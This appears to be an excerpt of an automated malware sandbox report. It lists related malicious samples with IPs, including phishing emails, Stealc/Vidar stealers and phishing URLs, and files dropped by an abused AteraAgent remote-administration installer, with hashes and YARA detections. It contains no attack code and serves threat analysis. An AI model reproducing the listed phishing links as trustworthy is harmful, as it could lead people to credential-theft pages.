                                                                                                                                                                                                                                                                                          • 150.171.27.10
                                                                                                                                                                                                                                                                                          (No subject) (100).emlGet hashmaliciousTycoon2FABrowse
                                                                                                                                                                                                                                                                                          • 104.47.64.28
                                                                                                                                                                                                                                                                                          https://irs-ci.secureemailportal.com/s/e?m=ABDvX2xiE1DvdsTP333wt4Qp&c=ABDsD05ZNJ23bCjfjm6gXjJS&em=publicrecords%40marionfl.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 13.107.42.14
                                                                                                                                                                                                                                                                                          Reminders for Msp-partner_ Server Alert.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 150.171.27.10
                                                                                                                                                                                                                                                                                          819614 - Midways Freight Ltd.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                          • 52.123.243.94
                                                                                                                                                                                                                                                                                          AMAZON-02USfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                          • 18.244.18.38
                                                                                                                                                                                                                                                                                          Paiement.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 76.76.21.98
                                                                                                                                                                                                                                                                                          zte.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 34.249.145.219
                                                                                                                                                                                                                                                                                          https:/click.mailchimp.com/track/click/30010842/docsend.com?p=eyJzIjoiT2RaN0hwNHlyY2E3VXl5TWcwMlA2eFpHVlN3IiwidiI6MSwicCI6IntcInVcIjozMDAxMDg0MixcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2RvY3NlbmQuY29tXFxcL3ZpZXdcXFwvZzZnYzZjazdtNHlkYTRpa1wiLFwiaWRcIjpcImNhZDg3NzI1Y2UzMjRiMzI4Yzk1ZGVkYWUyMzc4ZTZjXCIsXCJ1cmxfaWRzXCI6W1wiYzE5ZWU5NGJiMzA5YmZhOGQ2MDU3OGI1Mjk5NTFmOWE4NDQ0ODNhYVwiXX0ifQ#steven.davis@tu.eduGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 18.239.36.13
                                                                                                                                                                                                                                                                                          https://share.hsforms.com/11zbkP7dfTBO0LgTS5dCN0Asixz3Get hashmaliciousMamba2FABrowse
                                                                                                                                                                                                                                                                                          • 18.245.31.89
                                                                                                                                                                                                                                                                                          https://app.pandadoc.com/document/v2?token=abf6587d58630a40e08d0ad15de8202e2e9c4af5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 99.86.8.175
                                                                                                                                                                                                                                                                                          (No subject) (100).emlGet hashmaliciousTycoon2FABrowse
                                                                                                                                                                                                                                                                                          • 108.138.217.58
                                                                                                                                                                                                                                                                                          https://www.canva.com/design/DAGVD7_HMvQ/PFkDB3TDx6Ru4nNALhSqqQ/view?utm_content=DAGVD7_HMvQ&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 18.245.187.2
                                                                                                                                                                                                                                                                                          Reminders for Msp-partner_ Server Alert.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 54.73.203.83
                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                          • 18.244.18.32
                                                                                                                                                                                                                                                                                          AMAZON-02USfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                          • 18.244.18.38
                                                                                                                                                                                                                                                                                          Paiement.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 76.76.21.98
                                                                                                                                                                                                                                                                                          zte.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 34.249.145.219
                                                                                                                                                                                                                                                                                          https:/click.mailchimp.com/track/click/30010842/docsend.com?p=eyJzIjoiT2RaN0hwNHlyY2E3VXl5TWcwMlA2eFpHVlN3IiwidiI6MSwicCI6IntcInVcIjozMDAxMDg0MixcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2RvY3NlbmQuY29tXFxcL3ZpZXdcXFwvZzZnYzZjazdtNHlkYTRpa1wiLFwiaWRcIjpcImNhZDg3NzI1Y2UzMjRiMzI4Yzk1ZGVkYWUyMzc4ZTZjXCIsXCJ1cmxfaWRzXCI6W1wiYzE5ZWU5NGJiMzA5YmZhOGQ2MDU3OGI1Mjk5NTFmOWE4NDQ0ODNhYVwiXX0ifQ#steven.davis@tu.eduGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 18.239.36.13
                                                                                                                                                                                                                                                                                          https://share.hsforms.com/11zbkP7dfTBO0LgTS5dCN0Asixz3Get hashmaliciousMamba2FABrowse
                                                                                                                                                                                                                                                                                          • 18.245.31.89
                                                                                                                                                                                                                                                                                          https://app.pandadoc.com/document/v2?token=abf6587d58630a40e08d0ad15de8202e2e9c4af5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 99.86.8.175
                                                                                                                                                                                                                                                                                          (No subject) (100).emlGet hashmaliciousTycoon2FABrowse
                                                                                                                                                                                                                                                                                          • 108.138.217.58
                                                                                                                                                                                                                                                                                          https://www.canva.com/design/DAGVD7_HMvQ/PFkDB3TDx6Ru4nNALhSqqQ/view?utm_content=DAGVD7_HMvQ&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 18.245.187.2
                                                                                                                                                                                                                                                                                          Reminders for Msp-partner_ Server Alert.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 54.73.203.83
                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                          • 18.244.18.32
                                                                                                                                                                                                                                                                                          No context
Columns: Match; Associated Sample Name / URL; Detection; Threat Name

Match: C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll
• ALVARA-072.msi; malicious; AteraAgent
• setup_north_west_arctic_borrough.msi; malicious; AteraAgent
• 9rSeCZbjZE.msi; malicious; AteraAgent
• TRABALHO----PROCESSO0014S55-S440000000S1.msi; malicious; AteraAgent
• SecuriteInfo.com.Program.RemoteAdminNET.1.367.20003.msi; malicious; AteraAgent
• AdobeUpdate.msi; malicious; AteraAgent
• SecuriteInfo.com.Program.RemoteAdminNET.1.3218.16257.msi; malicious; AteraAgent
• Y3Wvl9aYAU.cmd; malicious; AteraAgent
• SecuriteInfo.com.Program.RemoteAdminNET.1.15125.10364.msi; malicious; AteraAgent
• SecuriteInfo.com.Program.RemoteAdminNET.1.7216.330.msi; malicious; AteraAgent

Match: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
• ALVARA-072.msi; malicious; AteraAgent
• setup_north_west_arctic_borrough.msi; malicious; AteraAgent
• 9rSeCZbjZE.msi; malicious; AteraAgent
• TRABALHO----PROCESSO0014S55-S440000000S1.msi; malicious; AteraAgent
• SecuriteInfo.com.Program.RemoteAdminNET.1.367.20003.msi; malicious; AteraAgent
• AdobeUpdate.msi; malicious; AteraAgent
• SecuriteInfo.com.Program.RemoteAdminNET.1.3218.16257.msi; malicious; AteraAgent
• Y3Wvl9aYAU.cmd; malicious; AteraAgent
• SecuriteInfo.com.Program.RemoteAdminNET.1.15125.10364.msi; malicious; AteraAgent
• SecuriteInfo.com.Program.RemoteAdminNET.1.7216.330.msi; malicious; AteraAgent

                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):8823
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.662722909851916
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:0jWxz1ccbTOOeMek861I7r6IHfI7r6kAVv70HVotBVeZEmzmYpLAV77yXpY92r:0aD2OcpctiB2ie
                                                                                                                                                                                                                                                                                                                                  MD5:74418E934C3B421B1FA339AB6EDD0B85
                                                                                                                                                                                                                                                                                                                                  SHA1:54488E09E5238994B496B36603D0BB0470682F10
                                                                                                                                                                                                                                                                                                                                  SHA-256:7A7F45DD82706C6F6B3203FF39809F3C378CE4580D139739A20B3599C3E629FD
                                                                                                                                                                                                                                                                                                                                  SHA-512:04CFA8B459F5782833AF020F9B88EF42548C9D1584C5C8D48EE10FCB668A5BFD4CE0D3EDF21106168A87C0FFBAC68E029A17BA2DFE3F2961959C478636FECC6E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Config.Msi\44c50b.rbs, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@.^Y.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent..Arquivo_4593167.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....StopAteraServiceQuiet....KillAteraTaskQuiet....ProcessComponents..Updating component registration..&.{F7DFE9BA-9FAD-11DA-9578-00E08161165F}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{C8C868DC-3A5E-4180-A7BB-03D6282966CB}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{0EC8B23C-C723-41E1-9105-4B9C2CDAD47A}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{F1B1B9D1-F1B0-420C-9D93-F04E9BD4795D}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{5F95F700-DCA4-4880-B2D2-891AE0D6E1A3}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{F62C52BA-15C7-4C3D-AAB2-DE65004F9665}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{38F0101
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):76037
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.733727884865765
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:oPXeqjCyEgH2bQzxW5wM/wt/JBQKwHhrRUL2l+Jq4599oefeIubJZrQ1vMF8EkdW:NSG
                                                                                                                                                                                                                                                                                                                                  MD5:109413131C38610726E55D39A16C53E1
                                                                                                                                                                                                                                                                                                                                  SHA1:FB34F5FE6B0184A339CF34F52606CBFDDC688F21
                                                                                                                                                                                                                                                                                                                                  SHA-256:3A31E275C4A5C5FF3AB3EC7323CAD7FC26E1C6CE44871C7D5810869AA7207B11
                                                                                                                                                                                                                                                                                                                                  SHA-512:23AF03B5BE756C2F0622D4250A9883AA683694B0A3CF233C897DFD53D240B5AE0B28E4BDE6A5958B28B68787C5ABFF7C244B13D6036C8DA42C0D4D73A6D29BC7
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@.^Y.@.....@.....@.....@.....@.....@......&.{B7C5EA94-B96A-41F5-BE95-25D78B486678}..Splashtop Streamer..setup.msi.@.....@.....@.....@......ARPPRODUCTICON.exe..&.{1FFB34B4-02B4-4EEE-ACA4-24941A8EDEE5}.....@.....@.....@.....@.......@.....@.....@.......@......Splashtop Streamer......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{3D8827C3-3F73-4AD7-9420-7CA93653C8F2}&.{B7C5EA94-B96A-41F5-BE95-25D78B486678}.@......&.{61B538AB-B209-C01B-F95C-B0A0531054D2}&.{B7C5EA94-B96A-41F5-BE95-25D78B486678}.@......&.{3742F778-8BAC-9729-A5BE-712DA9BEB95A}&.{B7C5EA94-B96A-41F5-BE95-25D78B486678}.@......&.{ADBB7064-411F-E593-D901-EACB3BA8154E}&.{B7C5EA94-B96A-41F5-BE95-25D78B486678}.@......&.{06653204-4010-8C69-AD0A-982273468010}&.{B7C5EA94-B96A-41F5-BE95-25D78B486678}.@......&.{76FB8673-364C-25A7-DEC2-3C43D0343A02}&.{B7C5EA94-B96A-41F5-BE95-25D78B486678}.@......&.{944490A2-222A-67EA-5532-3CEF12
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):464
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.223252342608367
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:Ea3LMOszle/YeVugrUucQBak5cSvpL7lgYKq9uSgmll/Vnpm/nsuRYaRsjXwpohe:EgjAOBjUcBn97lghq5j//a/fNl+9W
                                                                                                                                                                                                                                                                                                                                  MD5:4D4A6DEF9D042792A9DF96C430ED72D4
                                                                                                                                                                                                                                                                                                                                  SHA1:6E28912D26961146BCC57EB7DD28CEAFB768D476
                                                                                                                                                                                                                                                                                                                                  SHA-256:DD74B1C0F1FD56400737E599FCF739021E1DB468346CBC894EE49684AF2DAC6B
                                                                                                                                                                                                                                                                                                                                  SHA-512:B0941BF9E9EACD455CA7384E6020AF8F1760CBBAC4759E4B04FA08D571F173761FB616FCAD132367CF807D8B83298DC38BF2DE6CDE29631447A3FF6A282122F9
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@.^Y.@.....@.....@.....@.....@.....@......&.{B7C5EA94-B96A-41F5-BE95-25D78B486678}..Splashtop Streamer..setup.msi.@.....@.....@.....@......ARPPRODUCTICON.exe..&.{1FFB34B4-02B4-4EEE-ACA4-24941A8EDEE5}.....@.....@.....@.....@.......@.....@.....@.......@......Splashtop Streamer......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....Util_UpdateSetting....Util_InstSrvAndDrv....Util_InstDone...@.....@.....@....
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):57458
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.864942993197669
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:DL9BRzVH/GV1a67QzE/DBFIAL1UN7Tbob0qvJWj28erEReN4CVcaf1QeLHaH8o1w:vwI5i9jW38
                                                                                                                                                                                                                                                                                                                                  MD5:AA72E47D6B5B994FCBCACBC94CCDDF11
                                                                                                                                                                                                                                                                                                                                  SHA1:0B6545323579672E1C8194B882EE75EAE8DF6404
                                                                                                                                                                                                                                                                                                                                  SHA-256:A01159ADEAE69DAB7984A8CAEB0FAC7E1E5F67708DD334540D2495BF12CFBF67
                                                                                                                                                                                                                                                                                                                                  SHA-512:36E1C1BB62C7D0F865101C64A644BCBE3E2F3CA53DE5F59A3568A8BAD4A16195074B666A618DD47573FA69FDC21E063CE0B236D5A51FCB5B5F5A0AFBA1D6C501
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@.^Y.@.....@.....@.....@.....@.....@......&.{C79F6EEC-3A2B-487D-A3B6-EDF4057B4E4B}%.Microsoft .NET Runtime - 6.0.35 (x64)!.dotnet-runtime-6.0.35-win-x64.msi.@.....@.S.0.@.....@........&.{76657AF8-AF4E-4FA9-9A39-80AC267D9B11}.....@.....@.....@.....@.......@.....@.....@.......@....%.Microsoft .NET Runtime - 6.0.35 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{BCDE6883-BAB7-54AB-B504-D8C3F75FDB2A}&.{C79F6EEC-3A2B-487D-A3B6-EDF4057B4E4B}.@......&.{F621578B-E081-5FC4-B0C5-A151B816DC51}&.{C79F6EEC-3A2B-487D-A3B6-EDF4057B4E4B}.@......&.{B0658A77-9697-57AB-AEF0-C49F5788A264}&.{C79F6EEC-3A2B-487D-A3B6-EDF4057B4E4B}.@......&.{120A93F0-81ED-50CA-849C-D3C267F0E1B9}&.{C79F6EEC-3A2B-487D-A3B6-EDF4057B4E4B}.@......&.{B6486357-3BB8-567F-A403-76642301DF0F}&.{C79F6EEC-3A2B-487D-A3B6-EDF4057B4E4B}.@......&.{7DD77B54-D0C8-5E10-9C80-EE381420C680}&.{C79F6EEC-3A2B-487D-A3B6-EDF4057B4E
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9062
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.59654785770512
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:LFtGg8V0kejHptGIIxGICTBO76E6NZG6XXHws3M6p7RV/tbM7YB:LueGlGLH
                                                                                                                                                                                                                                                                                                                                  MD5:1DCF1C1B62324677C3BB537D907ACD74
                                                                                                                                                                                                                                                                                                                                  SHA1:508A9FB9129DF055935403F205C90CE755811B6D
                                                                                                                                                                                                                                                                                                                                  SHA-256:797C672C4D5B8279A82441A9A77C8BEE74D791CE49EC460DAFF94B99BD3ADD8E
                                                                                                                                                                                                                                                                                                                                  SHA-512:F93FF05B475B0D44D2F8ECEA819944B1DB56AA19B790A6E4EFBFECED066A90CE3FBB607C85049B8ED1566F897484BCBA96999A9033E9969E52203C2AD9FC961C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@..^Y.@.....@.....@.....@.....@.....@......&.{E91F8AC1-4917-455E-AACA-B40B193C7A62}..Microsoft .NET Host FX Resolver - 6.0.35 (x64)!.dotnet-hostfxr-6.0.35-win-x64.msi.@.....@.S.0.@.....@........&.{4E46258D-E612-40D6-A98B-8F64771E3561}.....@.....@.....@.....@.......@.....@.....@.......@......Microsoft .NET Host FX Resolver - 6.0.35 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{E3262256-B959-50C5-91BD-D2C1656236F1}&.{E91F8AC1-4917-455E-AACA-B40B193C7A62}.@......&.{B59DD035-01D3-57CD-A06D-224838439FEA}&.{E91F8AC1-4917-455E-AACA-B40B193C7A62}.@......&.{8EC524B8-7864-5ACE-B320-2D36216EBC12}&.{E91F8AC1-4917-455E-AACA-B40B193C7A62}.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..(.C:\Program Files\dotnet\host\fxr\6.0.35\....3.C:\Program Files\dotnet\host\fxr\6.0.35\hostfxr.dll....WriteRegistryValues..Writing system registry values..Key:
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10280
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.646671354105339
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:k3qLUB71Ew8lnfseOtRIImRI9OE5Bai6pe:kdB71Ew6MRaRxS
                                                                                                                                                                                                                                                                                                                                  MD5:E1CC6FA2AB8AC2FABA2246D0D70D68FE
                                                                                                                                                                                                                                                                                                                                  SHA1:488F593D1C919DF4F2DB762CF25E6EA5D45E4120
                                                                                                                                                                                                                                                                                                                                  SHA-256:08E94A11EDEB136B200C7D771E46A3A8945D93FE08184E29913FED2CF457A717
                                                                                                                                                                                                                                                                                                                                  SHA-512:890F08204E8CA34C4A457357A16A44FCF7F81F4A7F03619BB830016FCF66BFD3F58A257C5A2D3DE400A9AB7D58512DD43DF657F1D8F7788A356AE41649ECB7DC
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@..^Y.@.....@.....@.....@.....@.....@......&.{C59601A1-771B-426B-A9F7-6CACCAC4DB4E}".Microsoft .NET Host - 6.0.35 (x64)..dotnet-host-6.0.35-win-x64.msi.@.....@.S.0.@.....@........&.{C44636B0-CF91-423F-8EBB-E5C6C9CC18A4}.....@.....@.....@.....@.......@.....@.....@.......@....".Microsoft .NET Host - 6.0.35 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{3AB1371A-161F-5BD9-98C8-F9BF7A103CA5}&.{C59601A1-771B-426B-A9F7-6CACCAC4DB4E}.@......&.{45399BBB-DDA5-4386-A2E9-618FB3C54A18}&.{C59601A1-771B-426B-A9F7-6CACCAC4DB4E}.@......&.{EA9C3F98-F9B1-5212-8980-CFEAF2B15E0D}&.{C59601A1-771B-426B-A9F7-6CACCAC4DB4E}.@......&.{E4E008C8-57A8-5040-BB34-03024B15B6C5}&.{C59601A1-771B-426B-A9F7-6CACCAC4DB4E}.@......&.{CE35924C-AD31-51DF-B84A-A8052ED08400}&.{C59601A1-771B-426B-A9F7-6CACCAC4DB4E}.@......&.{A61CBE5B-1282-4F29-90AD-63597AA2372E}&.{C59601A1-771B-426B-A9F7-6CACCAC4DB4E}.@....
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):753
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.853078320826549
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:qLLYem7haYNem7hcomf3em7hUQLtygXnC9xkKxeCsx/Yem7haYNem7hcomf3em7B:qLUVhzVhM3VhdLtXXIxkKxeCsOVhzVhY
                                                                                                                                                                                                                                                                                                                                  MD5:8298451E4DEE214334DD2E22B8996BDC
                                                                                                                                                                                                                                                                                                                                  SHA1:BC429029CC6B42C59C417773EA5DF8AE54DBB971
                                                                                                                                                                                                                                                                                                                                  SHA-256:6FBF5845A6738E2DC2AA67DD5F78DA2C8F8CB41D866BBBA10E5336787C731B25
                                                                                                                                                                                                                                                                                                                                  SHA-512:CDA4FFD7D6C6DFF90521C6A67A3DBA27BF172CC87CEE2986AE46DCCD02F771D7E784DCAD8AEA0AD10DECF46A1C8AE1041C184206EC2796E54756E49B9217D7BA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Preview:.Installing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..Installing service AteraAgent.....Service AteraAgent has been successfully installed...Creating EventLog source AteraAgent in log Application.....Committing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (7463), with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):7466
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1606801095705865
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:R3DrP/zatgCnNjn1x62muDr9aHmzcv/65m7JDcm0BefnanGEkn56vT4ZvR++JDr+:NexdYX7OSRjXsaA0Ndhi
                                                                                                                                                                                                                                                                                                                                  MD5:362CE475F5D1E84641BAD999C16727A0
                                                                                                                                                                                                                                                                                                                                  SHA1:6B613C73ACB58D259C6379BD820CCA6F785CC812
                                                                                                                                                                                                                                                                                                                                  SHA-256:1F78F1056761C6EBD8965ED2C06295BAFA704B253AFF56C492B93151AB642899
                                                                                                                                                                                                                                                                                                                                  SHA-512:7630E1629CF4ABECD9D3DDEA58227B232D5C775CB480967762A6A6466BE872E1D57123B08A6179FE1CFBC09403117D0F81BC13724F259A1D25C1325F1EAC645B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?><ArrayOfKeyValueOfanyTypeanyType xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:x="http://www.w3.org/2001/XMLSchema" z:Id="1" z:Type="System.Collections.Hashtable" z:Assembly="0" xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><LoadFactor z:Id="2" z:Type="System.Single" z:Assembly="0" xmlns="">0.72</LoadFactor><Version z:Id="3" z:Type="System.Int32" z:Assembly="0" xmlns="">2</Version><Comparer i:nil="true" xmlns="" /><HashCodeProvider i:nil="true" xmlns="" /><HashSize z:Id="4" z:Type="System.Int32" z:Assembly="0" xmlns="">3</HashSize><Keys z:Id="5" z:Type="System.Object[]" z:Assembly="0" z:Size="2" xmlns=""><anyType z:Id="6" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">_reserved_nestedSavedStates</anyType><anyType z:Id="7" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/20
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):145968
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.874150428357998
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
                                                                                                                                                                                                                                                                                                                                  MD5:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                                                                                                                  SHA1:E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
                                                                                                                                                                                                                                                                                                                                  SHA-256:A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                                                                                                                                                                                                                                                                                                                  SHA-512:23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox View:
• Filename: ALVARA-072.msi, Detection: malicious
• Filename: setup_north_west_arctic_borrough.msi, Detection: malicious
• Filename: 9rSeCZbjZE.msi, Detection: malicious
• Filename: TRABALHO----PROCESSO0014S55-S440000000S1.msi, Detection: malicious
• Filename: SecuriteInfo.com.Program.RemoteAdminNET.1.367.20003.msi, Detection: malicious
• Filename: AdobeUpdate.msi, Detection: malicious
• Filename: SecuriteInfo.com.Program.RemoteAdminNET.1.3218.16257.msi, Detection: malicious
• Filename: Y3Wvl9aYAU.cmd, Detection: malicious
• Filename: SecuriteInfo.com.Program.RemoteAdminNET.1.15125.10364.msi, Detection: malicious
• Filename: SecuriteInfo.com.Program.RemoteAdminNET.1.7216.330.msi, Detection: malicious
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
